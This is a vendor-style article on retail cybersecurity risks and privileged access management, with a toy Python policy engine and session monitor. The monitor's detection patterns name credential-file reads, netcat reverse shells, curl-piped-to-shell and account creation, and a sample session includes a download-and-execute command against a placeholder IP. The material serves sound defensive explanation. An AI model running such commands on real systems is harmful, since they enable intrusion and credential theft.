Retail at Risk: Cybersecurity Challenges and Solutions

Whether a multinational giant like Amazon or a more regional chain like Safeway, retail systems are ubiquitous around the world. Just as ubiquitous are cyberattacks, and many of them are aimed directly at retail systems: 64% of retailers report an attempted attack on a monthly basis.

There are a number of factors that make retail systems attractive targets for hackers. Fortunately, there are also effective safeguards against these attacks.

The State of Technology in Retail

Among the primary reasons hackers frequently target retail systems is the mixed technology that comprises them. It is common for a retail environment to run old and new technologies side by side: legacy point-of-sale (POS) systems and cash registers on the front end, with cloud-based systems powering eCommerce, logistics, and administration on the back end.

In part, the mixed technological state of retail is driven by the industry’s desire to provide omnichannel touchpoints for consumers; that is, there is a keen need to provide convenience for the customer, whether that customer is in-store or online. Retailers are therefore slow to upgrade things like cash registers and POS systems, both because customers are familiar with them and because store staff are familiar with them and can efficiently process a high in-store volume of customers. On the other side of that coin, retailers also recognize the need to provide consumers with online convenience, and so have implemented newer technologies like eCommerce into their operations. Combined, these old and new systems meet retailers’ goals of both efficiency and scalability, but they also present multiple potential attack vectors for hackers.

Retail Cyber (In)Security

Cyberattacks against the retail sector are an ongoing concern: since Q1 of 2018 alone, successful attacks against major retailers including Best Buy, Macy’s, Sears, and Under Armour have been reported. Such attacks are costly: the average cost of a hack of an eCommerce site is $4 million, with an average price tag of $172 per data set. These costs have risen 29% since 2013, and as Big Data keeps getting bigger, the costs associated with a successful attack are likely to continue to grow.

Aside from the mixed technologies inherent to the retail industry, there are also several other reasons why retail is especially at risk of attack:

  • Customer data is frequently high-value because it contains things like credit card numbers, phone numbers, and security questions and answers, and is thus sought after by hackers.
  • Staff turnover is traditionally high, so without proper offboarding, privileged accounts belonging to people who have left remain active when they should no longer exist.
  • The prevalence of eCommerce systems means there is a publicly accessible front end connected to critical systems in the background.
  • Each supplier and contractor that needs access to the system is a potential attack vector.
  • Automated warehouse and logistics IoT devices also provide a large number of potential entry points into a retail system.

Retail Security, Simplified

The risks outlined above all point, directly or indirectly, to the need for robust privileged access management. Privileged access refers to access to system resources that requires elevated permissions, such as the ability to query database servers, or even to see them on the network in the first place.

Privileged Access Management (PAM), in turn, means ensuring that users without elevated permissions cannot reach privileged resources, and that users who do have privileged access see only the resources that are necessary and appropriate to them, under circumstances (e.g., time and location) that are also appropriate.

Because so many of the cybersecurity risks inherent to retail are related to privileged access, a robust PAM solution that spans the entire system makes it vastly more secure than it otherwise would be, and simplifies that security in the process. It does so by granting only the privileges that are appropriate, and by revoking them when they are no longer appropriate. Here’s how a PAM solution should handle each of the risks discussed above:

  • Attacks through a public access point such as an eCommerce login are stopped before they can do systemic damage or spread, because the PAM system never grants such users privileged access to any part of the system. PAM does not fix vulnerabilities in the web application itself; what it does is limit what an attacker who gets through the front end can reach.
  • Outdated user accounts are discoverable and any privileged credentials easily (or automatically) revoked, which keeps hackers from successful attacks via outdated staff accounts.
  • Third parties like suppliers and contractors can only see systems that are relevant to them, and can’t “bounce” to unrelated systems. For example, a supplier may be granted privileged access to a certain logistics function but will not even be aware of other system components, much less have access to them. Or a contractor may be granted privileged access to work on a server, but only at a given time and for a given duration. In both situations, even if a hacker were to compromise a third-party login, they would still not be able to cause widespread damage, because the PAM solution would prevent any further access.
  • A robust PAM solution also secures machine-to-machine (M2M) components within a system. Thus even if a hacker somehow gains control of an IoT device in an automated warehouse, for example, the PAM solution hasn’t granted privileged access to that device – and thus the hacker cannot use it as a platform from which to further their exploits.

To secure the system even further, a full-featured PAM solution should be capable of real-time monitoring of all privileged session activity, and also of either automatically terminating suspicious sessions or else alerting an admin (or both).
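The policy behaviour described in the list above and the session monitoring in the previous paragraph can be made concrete in a few dozen lines. The following is an added illustration written for this page, not WALLIX Bastion code: a toy policy engine that denies by default, allows access only to the exact resource named in a grant and only inside its time window, revokes accounts that have gone dormant, and scans recorded session commands, terminating the session at the first suspicious one. All account names, resource names, the 30-day idle threshold, the suspicious-command patterns, and the sample session lines are constructed assumptions.

```python
"""Toy privileged-access policy engine and session monitor (illustration only;
not WALLIX code). Accounts, resources, thresholds and log lines are constructed."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
import re


@dataclass
class Grant:
    resource: str       # assumed resource name, e.g. "logistics-api"
    start: datetime     # grant is valid for start <= now < end
    end: datetime


@dataclass
class Account:
    name: str
    kind: str           # "staff", "contractor", "supplier", "customer", ...
    grants: list = field(default_factory=list)
    last_seen: datetime = datetime.min
    revoked: bool = False


def authorize(acct, resource, when):
    """Deny by default: allow only an unrevoked account holding a grant that
    names this exact resource and whose time window contains `when`.
    A supplier with a grant on "logistics-api" therefore cannot "bounce" to
    "crm-db", and a contractor cannot use their window early."""
    if acct.revoked:
        return False
    return any(g.resource == resource and g.start <= when < g.end
               for g in acct.grants)


def revoke_dormant(accounts, now, max_idle=timedelta(days=30)):
    """Strip privileges from accounts idle longer than max_idle (the leaver
    whose account was never closed). Returns the names revoked."""
    revoked = []
    for a in accounts:
        if not a.revoked and now - a.last_seen > max_idle:
            a.revoked = True
            a.grants.clear()
            revoked.append(a.name)
    return revoked


# Assumed patterns a monitored privileged session should never contain for
# these roles; a real deployment tunes this per role and resource.
SUSPICIOUS = [
    re.compile(r"\bcat\s+/etc/shadow\b"),
    re.compile(r"\bnc\b.*-e\s*/bin/(ba)?sh"),
    re.compile(r"\bcurl\b.*\|\s*(ba)?sh\b"),
    re.compile(r"\buseradd\b"),
]


def monitor_session(log_lines):
    """Scan recorded session commands in order. Returns
    (terminated, offending_line, commands_allowed_before_termination)."""
    allowed = 0
    for line in log_lines:
        if any(p.search(line) for p in SUSPICIOUS):
            return True, line, allowed
        allowed += 1
    return False, None, allowed


def demo():
    """Run the scenarios from the text on constructed accounts."""
    now = datetime(2018, 6, 1, 10, 0)
    supplier = Account("acme-logistics", "supplier", last_seen=now - timedelta(days=1),
                       grants=[Grant("logistics-api", now - timedelta(hours=1), now + timedelta(hours=8))])
    contractor = Account("pos-vendor", "contractor", last_seen=now,
                         grants=[Grant("pos-server-07", now + timedelta(hours=2), now + timedelta(hours=4))])
    leaver = Account("j.smith", "staff", last_seen=now - timedelta(days=90),
                     grants=[Grant("crm-db", datetime.min, datetime.max)])
    shopper = Account("webuser-1234", "customer", last_seen=now)   # never holds a grant
    accounts = [supplier, contractor, leaver, shopper]
    revoked = revoke_dormant(accounts, now)
    results = {
        "supplier_logistics": authorize(supplier, "logistics-api", now),
        "supplier_crm": authorize(supplier, "crm-db", now),                        # cannot bounce
        "contractor_now": authorize(contractor, "pos-server-07", now),             # before window
        "contractor_in_window": authorize(contractor, "pos-server-07", now + timedelta(hours=3)),
        "leaver": authorize(leaver, "crm-db", now),                                # revoked as dormant
        "shopper": authorize(shopper, "crm-db", now),                              # no grant at all
        "revoked": revoked,
    }
    # Constructed session transcript: third command is a download-and-execute.
    session = ["ls /var/log/pos", "tail -n 50 /var/log/pos/app.log",
               "curl http://198.51.100.7/x.sh | sh", "id"]
    results["session"] = monitor_session(session)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The important design point is the shape of `authorize`: there is no allow-list of "everything else", so a compromised customer login or a device identity with no grant evaluates to a denial without any special-casing, and a grant that names one resource gives no visibility into any other.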

Retail Regulatory Compliance, Simplified

The retail industry is subject to a wide variety of regulations and standards with which companies must comply: PCI DSS, GDPR, SOX, and the NIST frameworks, to name just a few. Along with its session monitoring capabilities, if the PAM solution also records every session and makes the recordings searchable, there is always an audit trail to support compliance with all of them. The recorded sessions are also useful for security reviews and for training security team members.

Risky Business: Cybersecurity in Retail Webinar

Cybersecurity in the retail industry is complicated, but a solution involving privileged access management needn’t be. For more insights on the topic, be sure to watch the webinar from which the above was drawn, Risky Business: Cybersecurity in Retail, presented by WALLIX cybersecurity expert Grant Burst. Grant discusses all of the above topics, provides his own insights based on years in the cybersecurity industry, and then tells the (true!) story of how one leading sporting goods retailer used the WALLIX Bastion to dramatically improve their cybersecurity.